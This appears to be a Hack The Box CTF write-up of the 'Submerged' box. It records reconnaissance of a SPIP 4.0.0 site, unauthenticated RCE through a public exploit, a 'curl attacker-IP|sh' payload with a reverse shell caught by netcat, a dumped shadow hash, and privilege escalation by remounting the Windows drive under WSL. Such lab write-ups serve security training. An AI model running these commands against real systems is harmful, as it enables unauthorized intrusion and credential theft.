Submerged

May 18, 2024 · Hack The Box / Business CTF 2024 boxesspiprcewslprivilege-escalation

Challenge

CTF: HTB Business CTF 2024: The Vault of Hope
Name: Submerged
Category: Fullpwn
Difficulty: Very Easy
Points: 500
Description: N/A
Objective: SPIP CMS RCE & WSL

Writeup

NMAP:

# Nmap 7.94SVN scan initiated Sat May 18 13:27:10 2024 as: /bin/nmap -n -sC -sV -v -p- --min-rate 3000 --stats-every 3m --max-retries 2 --max-scan-delay 20 --script-args "http.useragent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" -T4 -oA ./scans/20240518_132710_tcpall submerged.htb
Nmap scan report for submerged.htb (10.129.238.15)
Host is up (0.019s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Submerged Blog
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 18 13:28:05 2024 -- 1 IP address (1 host up) scanned in 55.42 seconds

Add site to /etc/hosts: submerged.htb and spip.submerged.htb

fullpwn_submerged_1 Email: [email protected]

Another domain: fullpwn_submerged_2

http://spip.submerged.htb/

fullpwn_submerged_3

http://spip.submerged.htb/spip.php?page=login&url=spip.php%3Fpage%3Drecherche%26amp%3Brecherche%3Dx

CMS SPIP v4.0.0 from Wappalyzer:

WHATWEB http://spip.submerged.htb/                                               http://spip.submerged.htb/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.129.239.57], JQuery, MetaGenerator[SPIP 4.0.0], PoweredBy[SPIP], SPIP[4.0.0][http://spip.submerged.htb/local/config.txt], Script[text/javascript], Title[My SPIP site], UncommonHeaders[composed-by,x-spip-cache], nginx[1.18.0]

http://spip.submerged.htb/local/config.txt

Composed-By: SPIP 4.0.0 @ www.spip.net + spip(4.0.0),aide(2.0.2),archiviste(1.0.1),compagnon(2.0.2),dump(1.10.2),images(3.0.2),forum(2.0.2),mediabox(2.0.2),mots(3.0.2),plan(3.0.2),porte_plume(2.0.2),revisions(2.0.2),safehtml(2.0.3),sites(3.0.2),stats(2.0.2),tw(2.0.2),urls(3.0.2),iterateurs(1.0.6),queue(0.6.8),jquery(3.6.0),csstidy(1.15.1),minidoc(1.0.3),ordoc(1.1.2),mejs(4.2.7),bigup(2.0.2),compresseur(1.15.2),medias(3.2.0),svp(2.4.0)

SPIP RCE

Searchsploit: Comment lines 63-67 (some SSL stuff)

searchsploit -m 51536
SPIP v4.2.0 - Remote Code Execution (Unauthenticated) | php/webapps/51536.py

python3 51536.py -u http://spip.submerged.htb -c 'curl 10.10.14.78|sh' -v
[+] Anti-CSRF token found : AjzF9XJNlBSyJBhV8KdKNiqEv32Be2xJyQo0uk9Ew4Q32Q+zmlKW5dqgqqIw54Aaaach4N5lYyo/HSE=
[+] Execute this payload : s:39:"<?php system('curl 10.10.14.78|sh'); ?>";

Host This:

curl https://resh.now.sh/10.10.14.78:4444 -o index.html
python3 -m http.server 80

Catch Shell:

nc -nlvp 4444

matthew@WIN-1EGDT8E0CN3:/var/www/spip$ cd ~
matthew@WIN-1EGDT8E0CN3:~$ ls -al
total 8
drwxr-xr-x 1 matthew matthew  512 May 18 09:11 .
drwxr-xr-x 1 root    root     512 Apr 10 11:05 ..
lrwxrwxrwx 1 root    root       9 Apr 23 05:05 .bash_history -> /dev/null
-rw-r--r-- 1 matthew matthew  220 Apr 10 11:05 .bash_logout
-rw-r--r-- 1 matthew matthew 3771 Apr 10 11:05 .bashrc
drwxrwxrwx 1 matthew matthew  512 Apr 10 11:29 .cache
drwx------ 1 matthew matthew  512 Apr 10 11:29 .config
drwxr-xr-x 1 matthew matthew  512 Apr 27 11:39 .landscape
drwxrwxrwx 1 matthew matthew  512 Apr 10 11:29 .local
-rw-rw-rw- 1 matthew matthew    0 Apr 30 09:30 .motd_shown
-rw-r--r-- 1 matthew matthew  807 Apr 10 11:05 .profile
-rw-r--r-- 1 matthew matthew    0 Apr 30 13:36 .sudo_as_admin_successful
-rw-rw-rw- 1 matthew matthew   21 May 18 09:19 user.txt
matthew@WIN-1EGDT8E0CN3:~$ cat user.txt
HTB{SpIP_Abu53_4_RC3}

Flag: HTB{SpIP_Abu53_4_RC3}

Privilege Escalation via WSL Remounting

matthew@WIN-1EGDT8E0CN3:~$ sudo -l
Matching Defaults entries for matthew on WIN-1EGDT8E0CN3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User matthew may run the following commands on WIN-1EGDT8E0CN3:
    (ALL : ALL) NOPASSWD: ALL

No root flag?

root@WIN-1EGDT8E0CN3:~# cat /etc/shadow | grep \\$
matthew:$6$9KWsy20I$taAs8VVeNbl3i35IFgBF7wY6jeDFFg0SKfDEaLkbLXc4hmsqsbuUUAHQdTDUrfeezunDhTx0JpamqGdWHOY4o/:19823:0:99999:7:::
root@WIN-1EGDT8E0CN3:~# ip a
3: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 group default qlen 1
    link/ether 00:50:56:b0:32:70
    inet 10.129.239.57/16 brd 10.129.255.255 scope global dynamic
       valid_lft 580sec preferred_lft 580sec
    inet6 dead:beef::93c3:56a9:41cd:86e2/64 scope global dynamic
       valid_lft 86395sec preferred_lft 14395sec
    inet6 dead:beef::174/128 scope global dynamic
       valid_lft 505sec preferred_lft 505sec
    inet6 fe80::b533:7085:d67a:36b9/64 scope link dynamic
       valid_lft forever preferred_lft forever
1: lo: <LOOPBACK,UP> mtu 1500 group default qlen 1
    link/loopback 00:00:00:00:00:00
    inet 127.0.0.1/8 brd 127.255.255.255 scope global dynamic
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host dynamic
       valid_lft forever preferred_lft forever

The c folder exists in /mnt/c:

matthew@WIN-1EGDT8E0CN3:~$ sudo cat /etc/wsl.conf
[automount]
enabled=false

[interop]
enabled=false
appendWindowsPath=false

matthew@WIN-1EGDT8E0CN3:~$ sudo mount -t drvfs 'c:' /mnt/c
matthew@WIN-1EGDT8E0CN3:~$ cd /mnt/c
matthew@WIN-1EGDT8E0CN3:/mnt/c$ ls -la
ls: cannot read symbolic link 'Documents and Settings': Permission denied
ls: cannot access 'pagefile.sys': Permission denied
ls: 'System Volume Information': Permission denied
total 0
drwxrwxrwx 1 root root 512 May 18 13:14  .
drwxr-xr-x 1 root root 512 Apr 10 11:04  ..
drwxrwxrwx 1 root root 512 Apr 26 16:40  Config.Msi
lrwxrwxrwx 1 root root  12 Apr 29  2020 'Documents and Settings'
drwxrwxrwx 1 root root 512 Oct 10  2020  PerfLogs
drwxrwxrwx 1 root root 512 Apr 26 16:38 'Program Files'
drwxrwxrwx 1 root root 512 Sep 15  2018 'Program Files (x86)'
drwxrwxrwx 1 root root 512 Apr 29  2020  ProgramData
drwxrwxrwx 1 root root 512 Apr 29  2020  Recovery
d--x--x--x 1 root root 512 Apr 29  2020 'System Volume Information'
drwxrwxrwx 1 root root 512 Apr 30 09:31  Users
drwxrwxrwx 1 root root 512 Apr 10 11:02  WSL
drwxrwxrwx 1 root root 512 May  8 05:12  Windows
-????????? ? ?    ?      ?            ?  pagefile.sys
matthew@WIN-1EGDT8E0CN3:/mnt/c$ cd Users
matthew@WIN-1EGDT8E0CN3:/mnt/c/Users$ ls
 Administrator  'All Users'   Default  'Default User'   Public   desktop.ini   matthew
matthew@WIN-1EGDT8E0CN3:/mnt/c/Users$ cd Administrator/Desktop
matthew@WIN-1EGDT8E0CN3:/mnt/c/Users/Administrator/Desktop$ ls
desktop.ini  root.txt
matthew@WIN-1EGDT8E0CN3:/mnt/c/Users/Administrator/Desktop$ cat root.txt
HTB{Pwn1ng_WsL_4_7h3_W1n}

Flag: HTB{Pwn1ng_WsL_4_7h3_W1n}